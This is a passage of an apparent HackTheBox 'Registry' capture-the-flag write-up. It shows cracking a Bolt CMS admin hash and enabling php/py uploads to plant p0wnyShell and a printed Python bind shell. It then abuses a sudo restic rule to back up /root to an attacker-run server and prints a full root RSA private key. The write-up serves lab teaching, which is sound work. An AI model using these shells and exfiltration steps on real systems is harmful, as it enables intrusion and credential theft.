System load: 0.0 Users logged in: 1 Usage of /: 5.7% of 61.80GB IP address for eth0: 10.10.10.159 Memory usage: 39% IP address for br-1bad9bd75d17: 172.18.0.1 Swap usage: 0% IP address for docker0: 172.17.0.1 Processes: 163 Last login: Sat Apr 4 00:57:04 2020 from 10.10.15.8 bolt@bolt:~$ whoami & hostname [1] 6324 bolt bolt bolt@bolt:~$
|
and Finally i can now get the user.txt
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)
System information as of Sat Apr 4 01:14:31 UTC 2020
System load: 0.0 Users logged in: 1 Usage of /: 5.7% of 61.80GB IP address for eth0: 10.10.10.159 Memory usage: 39% IP address for br-1bad9bd75d17: 172.18.0.1 Swap usage: 0% IP address for docker0: 172.17.0.1 Processes: 163 Last login: Sat Apr 4 00:57:04 2020 from 10.10.15.8 bolt@bolt:~$ whoami & hostname [1] 6324 bolt bolt bolt@bolt:~$ ls user.txt [1]+ Done whoami bolt@bolt:~$ cat user.txt ytc0y[-----------------------]3ywzi bolt@bolt:~$
|
Exploitation
So it’s time to do enumeration again the bolt user shell
, I tried LinPEAS to enumerate the shell, then I found out that there was a CMS installed in the machine which is "Bolt CMS"
wget, curl was not working, so I try netcat to transfer the linpeash.sh
bolt@bolt:/tmp$ nc -l -p 1234 > linpeas.sh
root in boxes/Registry/docker ❯ nc -w 3 10.10.10.159 1234 < linpeas.sh
bolt@bolt:/tmp$ chmod +x linpeas.sh bolt@bolt:/tmp$ bash linpeas.sh
|
# bash
====================================( Basic information )===================================== OS: Linux version 4.15.0-65-generic (buildd@lgw01-amd64-006) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #74-Ubuntu SMP Tue Sep 17 17:06:04 UTC 2019 User & Groups: uid=1001(bolt) gid=1001(bolt) groups=1001(bolt) Hostname: bolt Writable folder: /dev/shm [+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h) [+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h) [+] nmap is available for network discover & port scanning, you should use it yourself
|
BOLT CMS WEBSITE
Going deep of recon I see db.sqlite
which contains a password hash, and installed CMS Website at /var/www/html
directory.
# bash
[+] Looking for tables inside readable .db/.sqlite files (limit 100) -> Extracting tables from /var/www/html/bolt/vendor/codeception/codeception/tests/data/sqlite.db (limit 20) -> Extracting tables from /var/www/html/bolt/tests/phpunit/unit/resources/db/bolt.db (limit 20) --> Found for interesting column names in bolt_authtoken (output limit 10) CREATE TABLE bolt_authtoken (id INTEGER NOT NULL, user_id INTEGER DEFAULT NULL, username VARCHAR(32) DEFAULT NULL, token VARCHAR(128) NOT NULL, salt VARCHAR(128) NOT NULL, lastseen DATETIME DEFAULT NULL, ip VARCHAR(45) DEFAULT NULL, useragent VARCHAR(128) DEFAULT NULL, validity DATETIME DEFAULT NULL, PRIMARY KEY(id)) --> Found for interesting column names in bolt_users (output limit 10) CREATE TABLE bolt_users (id INTEGER NOT NULL, username VARCHAR(32) NOT NULL, password VARCHAR(128) NOT NULL, email VARCHAR(254) NOT NULL, lastseen DATETIME DEFAULT NULL, lastip VARCHAR(45) DEFAULT NULL, displayname VARCHAR(32) NOT NULL, stack CLOB NOT NULL --(DC2Type:json) , enabled BOOLEAN DEFAULT '1' NOT NULL, shadowpassword VARCHAR(128) DEFAULT NULL, shadowtoken VARCHAR(128) DEFAULT NULL, shadowvalidity DATETIME DEFAULT NULL, failedlogins INTEGER DEFAULT 0 NOT NULL, throttleduntil DATETIME DEFAULT NULL, roles CLOB NOT NULL --(DC2Type:json) , PRIMARY KEY(id))
-> Extracting tables from /var/www/html/bolt/app/database/bolt.db (limit 20) --> Found for interesting column names in bolt_authtoken (output limit 10) CREATE TABLE bolt_authtoken (id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, user_id INTEGER DEFAULT NULL, username VARCHAR(32) DEFAULT NULL, token VARCHAR(128) NOT NULL, salt VARCHAR(128) NOT NULL, lastseen DATETIME DEFAULT NULL, ip VARCHAR(45) DEFAULT NULL, useragent VARCHAR(128) DEFAULT NULL, validity DATETIME DEFAULT NULL) 9, 1, None, 2e3f688aab59a4586f54fbd3f284eb3b941b0580142356d840c7e582801b6388, 33aa58459b97be252a29fd98e3cdf81b, 2020-04-04 18:48:37, 10.10.15.104, Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:74.0) Gecko/20100101 Firefox/74.0, 2020-04-18 18:48:37 --> Found for interesting column names in bolt_users (output limit 10) CREATE TABLE bolt_users (id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, username VARCHAR(32) NOT NULL, password VARCHAR(128) NOT NULL, email VARCHAR(254) NOT NULL, lastseen DATETIME DEFAULT NULL, lastip VARCHAR(45) DEFAULT NULL, displayname VARCHAR(32) NOT NULL, stack CLOB NOT NULL --(DC2Type:json) , enabled BOOLEAN DEFAULT '1' NOT NULL, shadowpassword VARCHAR(128) DEFAULT NULL, shadowtoken VARCHAR(128) DEFAULT NULL, shadowvalidity DATETIME DEFAULT NULL, failedlogins INTEGER DEFAULT 0 NOT NULL, throttleduntil DATETIME DEFAULT NULL, roles CLOB NOT NULL --(DC2Type:json) ) 1, admin, $2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PK, bolt@registry.htb, 2020-04-04 22:00:22, 10.10.15.139, Admin, ["files:
[+] Web files?(output limit) /var/www/: total 16K drwxr-xr-x 4 root root 4.0K May 26 2019 . drwxr-xr-x 14 root root 4.0K May 19 2019 .. drwx------ 3 root root 4.0K May 26 2019 .cache drwxrwxr-x 4 www-data www-data 4.0K Apr 4 22:01 html
/var/www/html: total 32K drwxrwxr-x 4 www-data www-data 4.0K Apr 4 22:01 .
|
I visited the bolt website at registry.htb/bolt
Then I decrypt the password hasha using John The Ripper so:
# bash
root in htb/boxes/Registry via 🐘 v7.3.15 ❯ john bolt-hash --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3]) Cost 1 (iteration count) is 1024 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status strawberry (admin) 1g 0:00:00:05 DONE (2020-04-05 06:54) 0.1996g/s 71.85p/s 71.85c/s 71.85C/s strawberry..brianna Use the "--show" option to display all of the cracked passwords reliably Session completed
root in htb/boxes/Registry via 🐘 v7.3.15 took 9s ❯
|
after only 9 seconds i get the password strawberry and login this into Bolt CMS
BOLT CMS LOGIN PAGE
After login it display the dashboard which has a lot of stuffs.
BOLT CMS DASHBOARD PAGE
I search on the bolt cms exploit and I found this article it is the same version on the bolt cms installed on the registry machine.
I tried to follow the exploitation but it doesn’t work. Also this part was really hard because theres a cron job inside that will erase everything you modified to I need to be fast as much.
So this is the default Config.yml
in Bolt CMS Configuration where you can edit accept_file_types
.
In the configuration file i’ll put php
, and py
extensions so I can upload my webshells. Why I need to upload 2 different file ? PHP Reverse Shell is not working so I search for other webshell that I can execute and get remote inside on the webserver.
Until i found out that I can use Bind Shell
go gain remote shell. So I created my simple bind shell with python. this is similar to this one
import os import pty import socket
PORT = 9001
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('', PORT)) s.listen(1) (rem, addr) = s.accept() os.dup2(rem.fileno(),0) os.dup2(rem.fileno(),1) os.dup2(rem.fileno(),2) os.putenv("HISTFILE",'/dev/null') pty.spawn("/bin/bash") s.close()
|
save it ! then I used p0wnyShell so I can run the bind shell (shell.py
) and connect it with my Kali Linux so. after done setting up I’ uploaded it into File Management inside the Bolt CMS.
now I will open the p0wnyshell
and run the shell.py
You will see that the port is in already in use but it’s okay I can still connect with my Kali Linux, and Now I’m on the shell of www-data
# bash
root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 ❯ nc -v 10.10.10.159 9001 registry.htb [10.10.10.159] 9001 (?) open www-data@bolt:~/html/bolt/files$ ls ls www-data@bolt:~/html/bolt/files$ whoami whoami www-data
|
Privilege Escalation
As a www-data
user we can restic sudo
# bash
www-data@bolt:~/html/bolt/files$ sudo -l sudo -l Matching Defaults entries for www-data on bolt: env_reset, exempt_group=sudo, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bolt: (root) NOPASSWD: /usr/bin/restic backup -r rest* www-data@bolt:~/html/bolt/files$
|
So as we have privilege for running the restic we can get the root.
RESTIC BACKUP PROGRAM
So what is Restic ?
Restic is a backup program that is fast, efficient and secure. It supports the three major operating systems (Linux, macOS, Windows) and a few smaller ones (FreeBSD, OpenBSD).
Since we have privilege by running restic
we can backup the root directory and get the administrator shell.
First I install restic into may Kali Linux.
sudo apt-get install restic
|
after the installation, I will create backup folder and set a password on that.
root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 took 4m1s ❯ mkdir backups
root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 ❯ restic init -r ./backups/ enter password for new repository: enter password again: created restic repository 6f893c5da1 at ./backups/
Please note that knowledge of your password is required to access the repository. Losing your password means that your data is irrecoverably lost.
root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 took 13s ❯
|
Looking at the backups
directories
root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 took 13s ❯ ls backups/ config data index keys locks snapshots
root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 ❯
|
SETTING UP THE SERVER
Now I will install docker
to my machine and start a server at port 8000
root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 ❯ sudo apt install docker.io
|
Now i will run restic server on my machine and set the path at /backups
so:
root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 ❯ docker run -p 8000:8000 -v /root/htb/boxes/Registry/backups/:/backups -it restic/rest-server sh / rest-server 0.9.7 compiled with go1.10 on linux/amd64 Data directory: /backups Authentication disabled Private repositories disabled Starting server on :8000
|
after it’s successfully start the server we will go back the the bolt user shell and set reverse SSH
so:
root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 ❯ ssh -i id_rsa -R 8000:127.0.0.1:8000 bolt@10.10.10.159 Enter passphrase for key 'id_rsa': Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)
System information as of Sun Apr 5 01:51:21 UTC 2020
System load: 0.0 Users logged in: 1 Usage of /: 5.7% of 61.80GB IP address for eth0: 10.10.10.159 Memory usage: 37% IP address for br-1bad9bd75d17: 172.18.0.1 Swap usage: 1% IP address for docker0: 172.17.0.1 Processes: 164 Last login: Sun Apr 5 01:15:52 2020 from 10.10.15.43 bolt@bolt:~$
|
CREATING BACKUPS
Looks good ! Now I can create backups in www-data
, I will choose to backup /root/
folder because this what I need to ge the administrator so:
root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 ❯ nc -v 10.10.10.159 12346 registry.htb [10.10.10.159] 12346 (?) open www-data@bolt:~/html/bolt/files$
www-data@bolt:~/html/bolt/files$ sudo /usr/bin/restic backup -r rest:http://127.0.0.1:8000/ /root </restic backup -r rest:http://127.0.0.1:8000/ /root enter password for repository: -------------
password is correct found 2 old cache directories in /var/www/.cache/restic, pass --cleanup-cache to remove them scan [/root] scanned 10 directories, 14 files in 0:00 [0:01] 100.00% 28.066 KiB / 28.066 KiB 24 / 24 items 0 errors ETA 0:00 duration: 0:01 snapshot 4d60990a saved www-data@bolt:~/html/bolt/files$
|
Now it’s successfully saved on snapshot
, back into my machine I will restore the backup I created.
root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 ❯ restic -r backups/ restore latest --target restore/ enter password for repository: repository 6f893c5d opened successfully, password is correct created new cache in /root/.cache/restic restoring <Snapshot 4d60990a of [/root] at 2020-04-05 01:58:02.792216091 +0000 UTC by root@bolt> to restore/
root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 took 4s ❯
|
Success ! Now it will create /restore
folder which contains all the files we need, from there I can get the root.txt
root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 ❯ cd restore
root in boxes/Registry/restore ❯ ls root
root in boxes/Registry/restore ❯ cd root
root in Registry/restore/root ❯ ls config.yml cron.sh root.txt
root in Registry/restore/root ❯ cat root.txt ntrk[---------------------]kztgw
|
isn’t enough we need the administrator shell, i will use the id_rsa
inside the .ssh
so:
root in Registry/restore/root ❯ ls -la total 76 drwx------ 7 root root 4096 Oct 21 18:37 . drwx------ 3 root root 4096 Apr 5 09:59 .. lrwxrwxrwx 1 root root 9 May 29 2019 .bash_history -> /dev/null -rw-r--r-- 1 root root 3106 Sep 27 2019 .bashrc drwx------ 2 root root 4096 Sep 27 2019 .cache drwxr-xr-x 3 root root 4096 Sep 27 2019 .config -rw-r--r-- 1 root root 20999 Oct 21 18:04 config.yml -rw-r--r-- 1 root root 118 Oct 21 18:37 cron.sh drwx------ 3 root root 4096 Sep 27 2019 .gnupg drwxr-xr-x 3 root root 4096 Oct 9 04:57 .local -rw-r--r-- 1 root root 148 Aug 17 2015 .profile -r-------- 1 root root 33 Sep 27 2019 root.txt -rw-r--r-- 1 root root 66 Oct 21 18:00 .selected_editor drwxr-xr-x 2 root root 4096 Oct 17 17:58 .ssh -rw-r--r-- 1 root root 215 Oct 21 16:59 .wget-hsts
root in Registry/restore/root ❯ cd .ssh
root in restore/root/.ssh ❯ ls authorized_keys id_rsa id_rsa.pub
root in restore/root/.ssh ❯ chmod 600 id_rsa
root in restore/root/.ssh ❯ cat id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAmiGiXpswTyHhjgC55jHRWlGX1asEMyDFfkVwhuNohv/4cQKm cJB/3psQocosq+GMh9Y/uRPUgMcDnrTaNYOdkPS+QLd8vcFKSwSewH1w4/AYLuci 4k71qYsJlkcS2Pb0PqEcpodmXf4OBdTCiCCnjgGhOcvPpKMSCb1vy2Yo+A+eHzKp 1S48LgJRLKU1sGe0KE4MC8g7qpF7NSKOCW69z5KaoopQA3jPxnW17WE9PdGZQvqX 4/Mf9DGdeUrejRlX0BI2EGiZhPKwwKxqIHLRpw4pR4+OjR1sOkAA7UWtMYn/3cs+ IS3L75/i5Qsr0cMCtZ/hQAKtjpPoCCe1qHp7CQIDAQABAoIBAFlvYtQaoLGKK2NG sJgOGDicV8o37bvtLCvVBzJ+Ck0rgnGw4/s1Hb2BpOj8c2dY/T5k55zxEMGYuVUC BAxBTtCp8yuCTPOekQluqN9w6myZCK9Ol0NSJeI3N1zn6NvUkG0293T55EBuBp0D k82BhTg1YeQzi00xAmp8bb5MjUFCiCbSFH1MMpY/9itg1b3mqx7UlyDldMM9UdKH HS9aZmAzY5/U6wEtJi4mx3QIoVahytMgcxd7qoicCYyVm73HFQsZ58L+5QflygH4 dpbptPOnNmLUkWFXcK3bmlmrEyuafS6z68oDFeAZz8Dg2D2qXWfhdlN4GVstlxSI skH5sAECgYEAySOp7KOZJVpstF8zjn+/OZowEF4iSHnaGAX64B6GgWwXQURn3wVq tlqDO5m5vIexe2tyFDSVe5otWtzQvbPNkjpD7/kglGTbT9PCU/Dgb5pTmOxBPi9a 1W8+q7lwiXLIRb4NB+BqDz0yI924BnZt9rukzm9650Rrbala0HZxhIECgYEAxCux RQUzgSx7YdzThvB8sAzQJj2gNAbwEA9Y56I0pQLvTNoGQY8V8IYBrlvW935kLfcf xz8j5VNt1BizDQjG8j5FfVcU6VE98/OMgn4XKd6nl9sOoQBXzssjUF+3AIhn5DsK Q/IymTZEmhfGAt9k6dE4WH8qffea/E7qJY+pkokCgYAdatLiYjb2yJfXdYkD0Vk1 YoCfFDVtZizokI9VkgFYEmgASrHqY09tJiXFZMFOeoYRp/BCVkJ6ll0Fyf/Zjt+F AHKJOWVzbqDItw7X2gXpLKgHWJ5eKuzdBG0lDnUQFTKHSLl9Kmw4mFmp9zZ/83g3 us/qxVEzW8Vef4Nhs8D8gQKBgDtsMMqDhNKAMu+2AK1Dc8GwX+z1he28nEOBIqEn 1WKWvP4+nN6HBVJShXfXggp+UsJJtWqZiboRx5cT1EkCe6Etk8cf9cmnPmkDQXDV 2RZpx8KMLKZAgFi31/6kv759k1rjN3zVhNY8RhOXV/fOy7a4FaVY//ogYuZC0VKH bgphAoGBAKGyJQe/b6rUkpzvIBxbGt9Hw1kpLr07VCdPQb1MCdCU4l+mlDD5NBN3 mzygp6MTi+TvN3PhxlfAmUPbz0qw+3aX95pt2cQ492wLOe+RsVsKtvDTgH/2+DUe 2qnb+Jd6ERs3jmBeuuavC2O5ajhyLt1xL3uF5UVpoenCYlYuOvL4 -----END RSA PRIVATE KEY-----
root in restore/root/.ssh ❯
|
GET THE ADMIN SHELL
root in restore/root/.ssh ❯ ssh -i id_rsa root@registry.htb Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)
System information as of Sun Apr 5 02:06:19 UTC 2020
System load: 0.0 Users logged in: 1 Usage of /: 5.7% of 61.80GB IP address for eth0: 10.10.10.159 Memory usage: 38% IP address for br-1bad9bd75d17: 172.18.0.1 Swap usage: 1% IP address for docker0: 172.17.0.1 Processes: 169 Last login: Mon Oct 21 09:53:48 2019 root@bolt: whoami root root@bolt:~#
|
If you liked my writeup please leave a respect on my Profile
Referrences:
Anatomy of a hack: Docker Registry
Docker Registry
Exploiting Docker Registry
p0wnyshell
Bind Shell